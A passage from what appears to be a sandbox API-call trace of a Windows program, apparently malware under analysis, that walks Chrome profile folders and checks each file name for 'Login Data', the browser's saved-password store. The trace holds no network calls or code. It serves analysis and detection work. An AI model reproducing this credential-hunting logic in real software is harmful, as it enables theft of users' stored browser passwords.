HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" [0161.459] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.459] GetProcessHeap () returned 0x8e0000 [0161.459] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.459] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpSrch="Login Data") returned 0x0 [0161.459] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1f000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.459] GetProcessHeap () returned 0x8e0000 [0161.459] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0161.459] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82adc050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82adc050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0161.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.459] lstrlenW (lpString="\\") returned 1 [0161.459] GetProcessHeap () returned 0x8e0000 [0161.459] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.459] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0161.459] lstrlenW (lpString="CURRENT") returned 7 [0161.459] GetProcessHeap () returned 0x8e0000 [0161.459] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9257a0 [0161.459] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" [0161.460] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.460] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT", lpSrch="Login Data") returned 0x0 [0161.460] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.460] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82ad9940, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0161.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.460] lstrlenW (lpString="\\") returned 1 [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.460] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.460] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0161.460] lstrlenW (lpString="LOCK") returned 4 [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9257a0 [0161.460] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.460] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" [0161.460] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.460] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK", lpSrch="Login Data") returned 0x0 [0161.460] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.460] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0161.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.460] lstrlenW (lpString="\\") returned 1 [0161.460] GetProcessHeap () returned 0x8e0000 [0161.460] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.460] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.460] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.461] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0161.461] lstrlenW (lpString="LOG") returned 3 [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9257a0 [0161.461] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.461] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" [0161.461] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.461] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG", lpSrch="Login Data") returned 0x0 [0161.461] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.461] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0161.461] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.461] lstrlenW (lpString="\\") returned 1 [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.461] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.461] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.461] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0161.461] lstrlenW (lpString="MANIFEST-000001") returned 15 [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x9257a0 [0161.461] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.461] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" [0161.461] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.461] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001", lpSrch="Login Data") returned 0x0 [0161.461] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.461] GetProcessHeap () returned 0x8e0000 [0161.461] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.462] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0161.462] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.462] VirtualQuery (in: lpAddress=0x925610, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.462] GetProcessHeap () returned 0x8e0000 [0161.462] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925610 | out: hHeap=0x8e0000) returned 1 [0161.462] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.462] GetProcessHeap () returned 0x8e0000 [0161.462] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.462] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension State", cAlternateFileName="EXTENS~2")) returned 1 [0161.462] lstrcmpiW (lpString1="Extension State", lpString2=".") returned 1 [0161.462] lstrcmpiW (lpString1="Extension State", lpString2="..") returned 1 [0161.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.463] lstrlenW (lpString="\\") returned 1 [0161.463] GetProcessHeap () returned 0x8e0000 [0161.463] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.463] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.463] lstrlenW (lpString="Extension State") returned 15 [0161.463] GetProcessHeap () returned 0x8e0000 [0161.463] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0161.463] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.463] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.463] GetProcessHeap () returned 0x8e0000 [0161.463] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.463] lstrlenW (lpString="\\*.*") returned 4 [0161.463] GetProcessHeap () returned 0x8e0000 [0161.463] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925610 [0161.463] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*" [0161.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.465] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.465] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.465] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.465] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.465] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0161.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.465] lstrlenW (lpString="\\") returned 1 [0161.465] GetProcessHeap () returned 0x8e0000 [0161.465] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.465] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.465] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.466] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension 